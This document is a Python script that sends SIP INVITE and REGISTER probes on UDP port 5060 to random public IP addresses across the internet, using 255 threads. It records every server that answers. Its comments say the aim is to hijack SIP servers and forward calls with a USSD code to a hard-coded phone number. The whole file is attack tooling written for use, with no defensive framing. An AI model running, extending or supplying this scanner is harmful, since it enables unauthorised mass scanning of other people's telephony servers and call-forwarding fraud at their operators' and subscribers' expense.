import socket
import random
import select
import threading
import time

#IP data
servip="9.39.195.80" #reuse ipaddr for target sip server in order to hijack
myip="70.67.16.106"
port=5060

#INVITE data
name="James"
nameto="Herbert"
phoneno="*61*16043308323#" #hijack via call forwarding USSD code

#REGISTER data
enableregister=0 #enable registering but most sefvers nolonger support it
username="SELFCHECK" #default username
realm="asterisk" # default www authentication realm

#SIP data
sipdata="v=0\no="+nameto+" PHONENO PHONENO IN IP4 MYIP\ns=-\nc=IN IP4 MYIP\nt=0 0\nm=audio 49172 RTP/AVP 0\na=rtpmap:0 PCMU/8000\nport="+str(port)

#timeout and rate limiting options
timeout=0.3 #370 ms timeout
ratelimit=0

def findReplace(data, ip):
    return data.replace("SIPDATA", sipdata).replace("PHONENO", phoneno).replace("MYIP", myip).replace("SERVIP", servip).replace("IPADDR", ip).replace("PHONENO", phoneno).replace("CONTLEN", str(len(sipdata))).replace("PORT", str(port)).replace("NAME", name).replace("NAMTO", nameto).replace("USER", username).replace("REALM" ,realm)
sipdata=findReplace(sipdata, servip)
#open sip data file for reading
f=open("/sdcard/SIPSCAN1.txt", "r")
fdata1=f.read()
f.close()
f=open("/sdcard/SIPSCAN2.txt", "r")
fdata2=f.read()
f.close()

s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("", port))

def recvDatShiz(s):
    try:
        s.setblocking(0)
        ready = select.select([s], [], [], timeout)
        if ready[0]:
            data, addr = s.recvfrom(4096)
            return data, addr
    except:
        pass
    return b'', '0.0.0.0'
def dataCheck(data, ip):
    if data!=b'':
        if b"100 " in data or b"200 " in data or b"180 " in data: # check for auth or ringing
            print(data)
            print(ip)
            f=open("/sdcard/sip.txt", "a")
            f.write(ip+"\n")
            f.close()
    return data
def scanThread(fdata1, fdata2):
    while 1:
        ip=str(random.randrange(1,223))+"."+str(random.randrange(0,255))+"."+str(random.randrange(0,255))+"."+str(random.randrange(0,255))
        if ip.startswith("0") or ip.startswith("127") or ip.startswith("192") or ip.startswith("172") or ip.startswith("10."):
            continue
        try:
            if enableregister:
                s.sendto(findReplace(fdata1, ip).encode(), (ip, port))
                data, addr = recvDatShiz(s)
                if b"Unauthorized" in data or b"Illegal" in data or b"404" in data or "480" in data or data==b'':
                    continue
                dataCheck(data, ip)
            s.sendto(findReplace(fdata2, ip).encode(), (ip, port))
            data, addr = recvDatShiz(s)
            #if data!=b"":
            #    print(data)
            if b"Unauthorized" in data or b"Illegal" in data or b"404" in data or b"480" in data or data==b'':
                continue
            dataCheck(data, ip)
        except Exception as e:
            #print(str(e))
            continue
        time.sleep(ratelimit)
for i in range(0, 255):
    threading.Thread(target=scanThread, args=(fdata1,fdata2,)).start()